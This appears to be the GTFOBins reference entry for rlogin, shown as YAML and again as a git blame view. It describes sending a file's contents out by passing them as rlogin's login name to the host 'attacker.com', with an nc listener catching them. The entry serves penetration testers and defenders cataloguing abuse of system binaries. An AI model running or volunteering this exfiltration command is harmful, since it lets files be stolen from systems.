GTFOBins.github.io/_gtfobins/rlogin.md

---
description: |
  Usually `rlogin` is a symlink to `ssh`, the following works only when the *real* `rlogin` is used (e.g., from the `rsh-client` APT package).
functions:
  file-upload:
    - description: |
        Send contents of a file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker system to capture the contents.

        `rlogin` hangs waiting for the remote peer to close the socket.

        The file is corrupted by leading and trailing spurious data.
      code: |
        RHOST=attacker.com
        RPORT=12345
        LFILE=file_to_send
        rlogin -l "$(cat $LFILE)" -p $RPORT $RHOST
---
Create rlogin.md 2018-12-31 09:35:06 +01:00			`---`
Add comments to rlogin Close #45. 2018-12-31 13:31:46 +01:00			`description: \|`
			Usually `rlogin` is a symlink to `ssh`, the following works only when the real `rlogin` is used (e.g., from the `rsh-client` APT package).
Create rlogin.md 2018-12-31 09:35:06 +01:00			`functions:`
			`file-upload:`
Add comments to rlogin Close #45. 2018-12-31 13:31:46 +01:00			`- description: \|`
			Send contents of a file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker system to capture the contents.

			`rlogin` hangs waiting for the remote peer to close the socket.

			`The file is corrupted by leading and trailing spurious data.`
Create rlogin.md 2018-12-31 09:35:06 +01:00			`code: \|`
			`RHOST=attacker.com`
			`RPORT=12345`
			`LFILE=file_to_send`
			`rlogin -l "$(cat $LFILE)" -p $RPORT $RHOST`
			`---`